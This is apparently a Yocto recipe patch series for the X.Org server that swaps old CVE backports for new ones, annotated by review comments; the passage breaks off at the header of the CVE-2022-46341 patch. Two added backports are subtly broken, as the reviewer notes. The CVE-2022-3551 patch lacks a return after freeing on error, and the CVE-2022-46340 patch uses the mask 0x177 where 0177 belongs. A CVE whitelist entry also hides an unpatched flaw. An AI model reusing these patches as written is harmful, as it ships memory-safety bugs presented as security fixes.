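 S = "${WORKDIR}/${XORG_PN}-${PV}"
 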
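--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc
@@ -16,9 +16,17 @@ PE = "2"
 INC_PR = "r8"
 
 XORG_PN = "xorg-server"
-SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2"
+SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.gz"
 
-CVE_PRODUCT = "xorg-server"
+CVE_PRODUCT = "xorg-server x_server"
+# This is specific to Debian's xserver-wrapper.c
+CVE_CHECK_WHITELIST += "CVE-2011-4613"
+# As per upstream, exploiting this flaw is non-trivial and it requires exact
+# timing on the behalf of the attacker. Many graphical applications exit if their
+# connection to the X server is lost, so a typical desktop session is either
+# impossible or difficult to exploit. There is currently no upstream patch
+# available for this flaw.
+CVE_CHECK_WHITELIST += "CVE-2020-25697"
 
 S = "${WORKDIR}/${XORG_PN}-${PV}"
 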
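Review bot: `CVE_CHECK_WHITELIST += "CVE-2020-25697"` silences the scanner for a flaw that, by the comment's own words, has no upstream patch, so the entry hides an open issue, not a fixed or inapplicable one. The justification is also time-bound ("currently no upstream patch") and nothing in the recipe prompts anyone to look again. I would add a line such as `# Unfixed, risk accepted; re-evaluate on every xserver upgrade` directly above the entry. The `CVE-2011-4613` entry is different in kind, since the comment says the issue is specific to Debian's wrapper, and is fine as documented.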
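--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14345.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From f7cd1276bbd4fe3a9700096dec33b52b8440788d Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:46:32 +0200
-Subject: [PATCH] Correct bounds checking in XkbSetNames()
-
-CVE-2020-14345 / ZDI 11428
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-CVE: CVE-2020-14345
-Affects < 1.20.9
-
-Signed-off-by: Armin Kuster <akuster@mvista.com>
-
----
- xkb/xkb.c | 48 ++++++++++++++++++++++++++++++++++++++++++++++++
- 1 file changed, 48 insertions(+)
-
-Index: xorg-server-1.20.8/xkb/xkb.c
-===================================================================
---- xorg-server-1.20.8.orig/xkb/xkb.c
-+++ xorg-server-1.20.8/xkb/xkb.c
-@@ -152,6 +152,19 @@ static RESTYPE RT_XKBCLIENT;
- #define CHK_REQ_KEY_RANGE(err,first,num,r) \
- CHK_REQ_KEY_RANGE2(err,first,num,r,client->errorValue,BadValue)
-
-+static Bool
-+_XkbCheckRequestBounds(ClientPtr client, void *stuff, void *from, void *to) {
-+ char *cstuff = (char *)stuff;
-+ char *cfrom = (char *)from;
-+ char *cto = (char *)to;
-+
-+ return cfrom < cto &&
-+ cfrom >= cstuff &&
-+ cfrom < cstuff + ((size_t)client->req_len << 2) &&
-+ cto >= cstuff &&
-+ cto <= cstuff + ((size_t)client->req_len << 2);
-+}
-+
- /***====================================================================***/
-
- int
-@@ -4045,6 +4058,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- client->errorValue = _XkbErrCode2(0x04, stuff->firstType);
- return BadAccess;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + stuff->nTypes))
-+ return BadLength;
- old = tmp;
- tmp = _XkbCheckAtoms(tmp, stuff->nTypes, client->swapped, &bad);
- if (!tmp) {
-@@ -4074,6 +4089,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- }
- width = (CARD8 *) tmp;
- tmp = (CARD32 *) (((char *) tmp) + XkbPaddedSize(stuff->nKTLevels));
-+ if (!_XkbCheckRequestBounds(client, stuff, width, tmp))
-+ return BadLength;
- type = &xkb->map->types[stuff->firstKTLevel];
- for (i = 0; i < stuff->nKTLevels; i++, type++) {
- if (width[i] == 0)
-@@ -4083,6 +4100,8 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- type->num_levels, width[i]);
- return BadMatch;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + width[i]))
-+ return BadLength;
- tmp = _XkbCheckAtoms(tmp, width[i], client->swapped, &bad);
- if (!tmp) {
- client->errorValue = bad;
-@@ -4095,6 +4114,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- client->errorValue = 0x08;
- return BadMatch;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
-+ tmp + Ones(stuff->indicators)))
-+ return BadLength;
- tmp = _XkbCheckMaskedAtoms(tmp, XkbNumIndicators, stuff->indicators,
- client->swapped, &bad);
- if (!tmp) {
-@@ -4107,6 +4129,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- client->errorValue = 0x09;
- return BadMatch;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
-+ tmp + Ones(stuff->virtualMods)))
-+ return BadLength;
- tmp = _XkbCheckMaskedAtoms(tmp, XkbNumVirtualMods,
- (CARD32) stuff->virtualMods,
- client->swapped, &bad);
-@@ -4120,6 +4145,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- client->errorValue = 0x0a;
- return BadMatch;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
-+ tmp + Ones(stuff->groupNames)))
-+ return BadLength;
- tmp = _XkbCheckMaskedAtoms(tmp, XkbNumKbdGroups,
- (CARD32) stuff->groupNames,
- client->swapped, &bad);
-@@ -4141,9 +4169,14 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- stuff->nKeys);
- return BadValue;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + stuff->nKeys))
-+ return BadLength;
- tmp += stuff->nKeys;
- }
- if ((stuff->which & XkbKeyAliasesMask) && (stuff->nKeyAliases > 0)) {
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
-+ tmp + (stuff->nKeyAliases * 2)))
-+ return BadLength;
- tmp += stuff->nKeyAliases * 2;
- }
- if (stuff->which & XkbRGNamesMask) {
-@@ -4151,6 +4184,9 @@ _XkbSetNamesCheck(ClientPtr client, Devi
- client->errorValue = _XkbErrCode2(0x0d, stuff->nRadioGroups);
- return BadValue;
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp,
-+ tmp + stuff->nRadioGroups))
-+ return BadLength;
- tmp = _XkbCheckAtoms(tmp, stuff->nRadioGroups, client->swapped, &bad);
- if (!tmp) {
- client->errorValue = bad;
-@@ -4344,6 +4380,8 @@ ProcXkbSetNames(ClientPtr client)
- /* check device-independent stuff */
- tmp = (CARD32 *) &stuff[1];
-
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbKeycodesNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {
-@@ -4351,6 +4389,8 @@ ProcXkbSetNames(ClientPtr client)
- return BadAtom;
- }
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbGeometryNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {
-@@ -4358,6 +4398,8 @@ ProcXkbSetNames(ClientPtr client)
- return BadAtom;
- }
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbSymbolsNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {
-@@ -4365,6 +4407,8 @@ ProcXkbSetNames(ClientPtr client)
- return BadAtom;
- }
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbPhysSymbolsNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {
-@@ -4372,6 +4416,8 @@ ProcXkbSetNames(ClientPtr client)
- return BadAtom;
- }
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbTypesNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {
-@@ -4379,6 +4425,8 @@ ProcXkbSetNames(ClientPtr client)
- return BadAtom;
- }
- }
-+ if (!_XkbCheckRequestBounds(client, stuff, tmp, tmp + 1))
-+ return BadLength;
- if (stuff->which & XkbCompatNameMask) {
- tmp = _XkbCheckAtoms(tmp, 1, client->swapped, &bad);
- if (!tmp) {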
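--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14346.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From c940cc8b6c0a2983c1ec974f1b3f019795dd4cff Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:49:04 +0200
-Subject: [PATCH] Fix XIChangeHierarchy() integer underflow
-
-CVE-2020-14346 / ZDI-CAN-11429
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/c940cc8b6c0a2983c1ec974f1b3f019795dd4cff]
-CVE: CVE-2020-14346
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- Xi/xichangehierarchy.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
-index cbdd91258..504defe56 100644
---- a/Xi/xichangehierarchy.c
-+++ b/Xi/xichangehierarchy.c
-@@ -423,7 +423,7 @@ ProcXIChangeHierarchy(ClientPtr client)
- if (!stuff->num_changes)
- return rc;
-
-- len = ((size_t)stuff->length << 2) - sizeof(xXIChangeHierarchyReq);
-+ len = ((size_t)client->req_len << 2) - sizeof(xXIChangeHierarchyReq);
-
- any = (xXIAnyHierarchyChangeInfo *) &stuff[1];
- while (stuff->num_changes--) {
---
-2.17.1
-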
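--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14347.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From aac28e162e5108510065ad4c323affd6deffd816 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Sat, 25 Jul 2020 19:33:50 +0200
-Subject: [PATCH] fix for ZDI-11426
-
-Avoid leaking un-initalized memory to clients by zeroing the
-whole pixmap on initial allocation.
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-Reviewed-by: Alan Coopersmith <alan.coopersmith@oracle.com>
-
-
-Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/aac28e162e5108510065ad4c323affd6deffd816]
-CVE: CVE-2020-14347
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- dix/pixmap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/dix/pixmap.c b/dix/pixmap.c
-index 1186d7dbbf..5a0146bbb6 100644
---- a/dix/pixmap.c
-+++ b/dix/pixmap.c
-@@ -116,7 +116,7 @@ AllocatePixmap(ScreenPtr pScreen, int pixDataSize)
- if (pScreen->totalPixmapSize > ((size_t) - 1) - pixDataSize)
- return NullPixmap;
-
-- pPixmap = malloc(pScreen->totalPixmapSize + pixDataSize);
-+ pPixmap = calloc(1, pScreen->totalPixmapSize + pixDataSize);
- if (!pPixmap)
- return NullPixmap;
-
---
-GitLab
-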
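--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14361.patch
+++ /dev/null
@@ -1,36 +0,0 @@
-From 144849ea27230962227e62a943b399e2ab304787 Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:52:29 +0200
-Subject: [PATCH] Fix XkbSelectEvents() integer underflow
-
-CVE-2020-14361 ZDI-CAN 11573
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/144849ea27230962227e62a943b399e2ab304787]
-CVE: CVE-2020-14361
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- xkb/xkbSwap.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/xkb/xkbSwap.c b/xkb/xkbSwap.c
-index 1c1ed5ff4..50cabb90e 100644
---- a/xkb/xkbSwap.c
-+++ b/xkb/xkbSwap.c
-@@ -76,7 +76,7 @@ SProcXkbSelectEvents(ClientPtr client)
- register unsigned bit, ndx, maskLeft, dataLeft, size;
-
- from.c8 = (CARD8 *) &stuff[1];
-- dataLeft = (stuff->length * 4) - SIZEOF(xkbSelectEventsReq);
-+ dataLeft = (client->req_len * 4) - SIZEOF(xkbSelectEventsReq);
- maskLeft = (stuff->affectWhich & (~XkbMapNotifyMask));
- for (ndx = 0, bit = 1; (maskLeft != 0); ndx++, bit <<= 1) {
- if (((bit & maskLeft) == 0) || (ndx == XkbMapNotify))
---
-2.17.1
-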
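diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
deleted file mode 100644
index 2103e9c198..0000000000
--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14362.patch
+++ /dev/null
@@ -1,70 +0,0 @@
-From 2902b78535ecc6821cc027351818b28a5c7fdbdc Mon Sep 17 00:00:00 2001
-From: Matthieu Herrb <matthieu@herrb.eu>
-Date: Tue, 18 Aug 2020 14:55:01 +0200
-Subject: [PATCH] Fix XRecordRegisterClients() Integer underflow
-
-CVE-2020-14362 ZDI-CAN-11574
-
-This vulnerability was discovered by:
-Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
-
-Signed-off-by: Matthieu Herrb <matthieu@herrb.eu>
-
-Upstream-Status: Backport
-[https://gitlab.freedesktop.org/xorg/xserver/-/commit/2902b78535ecc6821cc027351818b28a5c7fdbdc]
-CVE: CVE-2020-14362
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- record/record.c | 10 +++++-----
- 1 file changed, 5 insertions(+), 5 deletions(-)
-
-diff --git a/record/record.c b/record/record.c
-index f2d38c877..be154525d 100644
---- a/record/record.c
-+++ b/record/record.c
-@@ -2500,7 +2500,7 @@ SProcRecordQueryVersion(ClientPtr client)
- } /* SProcRecordQueryVersion */
-
- static int _X_COLD
--SwapCreateRegister(xRecordRegisterClientsReq * stuff)
-+SwapCreateRegister(ClientPtr client, xRecordRegisterClientsReq * stuff)
- {
- int i;
- XID *pClientID;
-@@ -2510,13 +2510,13 @@ SwapCreateRegister(xRecordRegisterClientsReq * stuff)
- swapl(&stuff->nRanges);
- pClientID = (XID *) &stuff[1];
- if (stuff->nClients >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq))
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq))
- return BadLength;
- for (i = 0; i < stuff->nClients; i++, pClientID++) {
- swapl(pClientID);
- }
- if (stuff->nRanges >
-- stuff->length - bytes_to_int32(sz_xRecordRegisterClientsReq)
-+ client->req_len - bytes_to_int32(sz_xRecordRegisterClientsReq)
- - stuff->nClients)
- return BadLength;
- RecordSwapRanges((xRecordRange *) pClientID, stuff->nRanges);
-@@ -2531,7 +2531,7 @@ SProcRecordCreateContext(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordCreateContextReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordCreateContext(client);
- } /* SProcRecordCreateContext */
-@@ -2544,7 +2544,7 @@ SProcRecordRegisterClients(ClientPtr client)
-
- swaps(&stuff->length);
- REQUEST_AT_LEAST_SIZE(xRecordRegisterClientsReq);
-- if ((status = SwapCreateRegister((void *) stuff)) != Success)
-+ if ((status = SwapCreateRegister(client, (void *) stuff)) != Success)
- return status;
- return ProcRecordRegisterClients(client);
- } /* SProcRecordRegisterClients */
---
-2.17.1
-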
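diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
new file mode 100644
index 0000000000..efec7b6b4e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3550.patch
@@ -0,0 +1,40 @@
+From d2dcbdc67c96c84dff301505072b0b7b022f1a14 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:40:21 +0000
+Subject: [PATCH 1/3] xkb: proof GetCountedString against request length
+ attacks
+
+GetCountedString did a check for the whole string to be within the
+request buffer but not for the initial 2 bytes that contain the length
+field. A swapped client could send a malformed request to trigger a
+swaps() on those bytes, writing into random memory.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Ustream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]
+CVE: CVE-2022-3550
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index 68c59df..bf8aaa3 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5138,6 +5138,11 @@ _GetCountedString(char **wire_inout, ClientPtr client, char **str)
+ CARD16 len;
+
+ wire = *wire_inout;
++
++ if (client->req_len <
++ bytes_to_int32(wire + 2 - (char *) client->requestBuffer))
++ return BadValue;
++
+ len = *(CARD16 *) wire;
+ if (client->swapped) {
+ swaps(&len);
+--
+2.17.1
+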
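Review bot: The status trailer on line 14 of this new patch file is spelled `Ustream-Status:`, so any tooling that looks for the `Upstream-Status:` tag will likely treat the patch as carrying no status at all. It should read `Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=11beef0b7f1ed290348e45618e5fa0d2bffcb72e]`. The `Signed-off-by:Minjae Kim` trailer is also missing the space after the colon, here and in CVE-2022-3551.patch and CVE-2022-3553.patch. The added length check sits before the first read of `wire`, which is the right place for it; `_GetCountedString` continues outside the inner hunk.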
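diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
new file mode 100644
index 0000000000..a3b977aac9
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3551.patch
@@ -0,0 +1,64 @@
+From d3787290f56165f5656ddd2123dbf676a32d0a68 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Sun, 4 Dec 2022 17:44:00 +0000
+Subject: [PATCH 2/3] xkb: fix some possible memleaks in XkbGetKbdByName
+
+GetComponentByName returns an allocated string, so let's free that if we
+fail somewhere.
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=18f91b950e22c2a342a4fbc55e9ddf7534a707d2]
+CVE: CVE-2022-3551
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ xkb/xkb.c | 26 +++++++++++++++++++-------
+ 1 file changed, 19 insertions(+), 7 deletions(-)
+
+diff --git a/xkb/xkb.c b/xkb/xkb.c
+index bf8aaa3..f79d306 100644
+--- a/xkb/xkb.c
++++ b/xkb/xkb.c
+@@ -5908,19 +5908,31 @@ ProcXkbGetKbdByName(ClientPtr client)
+ xkb = dev->key->xkbInfo->desc;
+ status = Success;
+ str = (unsigned char *) &stuff[1];
+- if (GetComponentSpec(&str, TRUE, &status)) /* keymap, unsupported */
+- return BadMatch;
++ {
++ char *keymap = GetComponentSpec(&str, TRUE, &status); /* keymap, unsupported */
++ if (keymap) {
++ free(keymap);
++ return BadMatch;
++ }
++ }
+ names.keycodes = GetComponentSpec(&str, TRUE, &status);
+ names.types = GetComponentSpec(&str, TRUE, &status);
+ names.compat = GetComponentSpec(&str, TRUE, &status);
+ names.symbols = GetComponentSpec(&str, TRUE, &status);
+ names.geometry = GetComponentSpec(&str, TRUE, &status);
+- if (status != Success)
+- return status;
+- len = str - ((unsigned char *) stuff);
+- if ((XkbPaddedSize(len) / 4) != stuff->length)
+- return BadLength;
++ if (status == Success) {
++ len = str - ((unsigned char *) stuff);
++ if ((XkbPaddedSize(len) / 4) != stuff->length)
++ status = BadLength;
++ }
+
++ if (status != Success) {
++ free(names.keycodes);
++ free(names.types);
++ free(names.compat);
++ free(names.symbols);
++ free(names.geometry);
++ }
+ CHK_MASK_LEGAL(0x01, stuff->want, XkbGBN_AllComponentsMask);
+ CHK_MASK_LEGAL(0x02, stuff->need, XkbGBN_AllComponentsMask);
+
+--
+2.17.1
+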
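Review bot: The new `if (status != Success)` block in ProcXkbGetKbdByName frees `names.keycodes` through `names.geometry` but never returns, whereas the lines it replaces returned `status` (or `BadLength`) at this point. Execution therefore falls through to the `CHK_MASK_LEGAL` checks with an error that is no longer reported and with five freed, non-NULL pointers still stored in `names`, which risks a later use-after-free or double free on a malformed request. Add `return status;` as the last statement of that block, directly after `free(names.geometry);`. The rest of the function is outside the inner hunk, so the backport should be compared line by line with the upstream commit named in Upstream-Status.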
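diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
new file mode 100644
index 0000000000..94cea77edc
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-3553.patch
@@ -0,0 +1,49 @@
+From 57ad2c03730d56f8432b6d66b29c0e5a9f9b1ec2 Mon Sep 17 00:00:00 2001
+From: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+Date: Sun, 4 Dec 2022 17:46:18 +0000
+Subject: [PATCH 3/3] xquartz: Fix a possible crash when editing the
+ Application menu due to mutaing immutable arrays
+
+Crashing on exception: -[__NSCFArray replaceObjectAtIndex:withObject:]: mutating method sent to immutable object
+
+Application Specific Backtrace 0:
+0 CoreFoundation 0x00007ff80d2c5e9b __exceptionPreprocess + 242
+1 libobjc.A.dylib 0x00007ff80d027e48 objc_exception_throw + 48
+2 CoreFoundation 0x00007ff80d38167b _CFThrowFormattedException + 194
+3 CoreFoundation 0x00007ff80d382a25 -[__NSCFArray removeObjectAtIndex:].cold.1 + 0
+4 CoreFoundation 0x00007ff80d2e6c0b -[__NSCFArray replaceObjectAtIndex:withObject:] + 119
+5 X11.bin 0x00000001003180f9 -[X11Controller tableView:setObjectValue:forTableColumn:row:] + 169
+
+Fixes: https://github.com/XQuartz/XQuartz/issues/267
+Signed-off-by: Jeremy Huddleston Sequoia <jeremyhu@apple.com>
+
+Upstream-Status: Backport [https://cgit.freedesktop.org/xorg/xserver/commit/?id=dfd057996b26420309c324ec844a5ba6dd07eda3]
+CVE: CVE-2022-3553
+Signed-off-by:Minjae Kim <flowergom@gmail.com>
+
+---
+ hw/xquartz/X11Controller.m | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/hw/xquartz/X11Controller.m b/hw/xquartz/X11Controller.m
+index 3efda50..9870ff2 100644
+--- a/hw/xquartz/X11Controller.m
++++ b/hw/xquartz/X11Controller.m
+@@ -467,8 +467,12 @@ extern char *bundle_id_prefix;
+ self.table_apps = table_apps;
+
+ NSArray * const apps = self.apps;
+- if (apps != nil)
+- [table_apps addObjectsFromArray:apps];
++
++ if (apps != nil) {
++ for (NSArray <NSString *> * row in apps) {
++ [table_apps addObject:row.mutableCopy];
++ }
++ }
+
+ columns = [apps_table tableColumns];
+ [[columns objectAtIndex:0] setIdentifier:@"0"];
+--
+2.17.1
+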
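Review bot: The patch header does not say that the only file it changes, `hw/xquartz/X11Controller.m`, belongs to the macOS XQuartz front end, which this recipe presumably never compiles. If that is the case the patch does not change the built server and is carried only so the CVE is marked as handled; a reader auditing the recipe should be able to see that without opening the inner diff. I would add a line above the `Upstream-Status:` trailer such as `Note: affects hw/xquartz only; not built for this recipe's targets, carried for CVE tracking.` once that has been confirmed against the recipe's configure options.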
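diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
new file mode 100644
index 0000000000..3f6b68fea8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-4283.patch
@@ -0,0 +1,39 @@
+From ccdd431cd8f1cabae9d744f0514b6533c438908c Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 5 Dec 2022 15:55:54 +1000
+Subject: [PATCH] xkb: reset the radio_groups pointer to NULL after freeing it
+
+Unlike other elements of the keymap, this pointer was freed but not
+reset. On a subsequent XkbGetKbdByName request, the server may access
+already freed memory.
+
+CVE-2022-4283, ZDI-CAN-19530
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ccdd431cd8f1cabae9d744f0514b6533c438908c]
+CVE: CVE-2022-4283
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ xkb/xkbUtils.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/xkb/xkbUtils.c b/xkb/xkbUtils.c
+index 8975ade..9bc51fc 100644
+--- a/xkb/xkbUtils.c
++++ b/xkb/xkbUtils.c
+@@ -1327,6 +1327,7 @@ _XkbCopyNames(XkbDescPtr src, XkbDescPtr dst)
+ }
+ else {
+ free(dst->names->radio_groups);
++ dst->names->radio_groups = NULL;
+ }
+ dst->names->num_rg = src->names->num_rg;
+
+--
+2.25.1
+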
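diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
new file mode 100644
index 0000000000..a6c97485cd
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46340.patch
@@ -0,0 +1,55 @@
+From b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 29 Nov 2022 12:55:45 +1000
+Subject: [PATCH] Xtest: disallow GenericEvents in XTestSwapFakeInput
+
+XTestSwapFakeInput assumes all events in this request are
+sizeof(xEvent) and iterates through these in 32-byte increments.
+However, a GenericEvent may be of arbitrary length longer than 32 bytes,
+so any GenericEvent in this list would result in subsequent events to be
+misparsed.
+
+Additional, the swapped event is written into a stack-allocated struct
+xEvent (size 32 bytes). For any GenericEvent longer than 32 bytes,
+swapping the event may thus smash the stack like an avocado on toast.
+
+Catch this case early and return BadValue for any GenericEvent.
+Which is what would happen in unswapped setups anyway since XTest
+doesn't support GenericEvent.
+
+CVE-2022-46340, ZDI-CAN 19265
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Acked-by: Olivier Fourdan <ofourdan@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/b320ca0ffe4c0c872eeb3a93d9bde21f765c7c63]
+CVE: CVE-2022-46340
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ Xext/xtest.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Xext/xtest.c b/Xext/xtest.c
+index 38b8012..bf11789 100644
+--- a/Xext/xtest.c
++++ b/Xext/xtest.c
+@@ -501,10 +501,11 @@ XTestSwapFakeInput(ClientPtr client, xReq * req)
+
+ nev = ((req->length << 2) - sizeof(xReq)) / sizeof(xEvent);
+ for (ev = (xEvent *) &req[1]; --nev >= 0; ev++) {
++ int evtype = ev->u.u.type & 0x177;
+ /* Swap event */
+- proc = EventSwapVector[ev->u.u.type & 0177];
++ proc = EventSwapVector[evtype];
+ /* no swapping proc; invalid event type? */
+- if (!proc || proc == NotImplemented) {
++ if (!proc || proc == NotImplemented || evtype == GenericEvent) {
+ client->errorValue = ev->u.u.type;
+ return BadValue;
+ }
+--
+2.25.1
+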
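Review bot: The new mask in XTestSwapFakeInput is the hex literal `0x177`, while the line it replaces masked with the octal literal `0177` (0x7f). Because `0x177` has bit 3 clear, an event type such as 12 is reduced to 4 and the wrong `EventSwapVector` entry is selected, so a byte-swapped client's event is swapped with a handler written for a different layout. The `GenericEvent` comparison still happens to work, since 35 survives either mask, which is probably why the slip is easy to miss. Change the line to `int evtype = ev->u.u.type & 0177;`. The loop body continues outside the inner hunk.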
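diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2022-46341.patch
new file mode 100644
index 0000000000..0ef6e5fc9f
--- /dev/null
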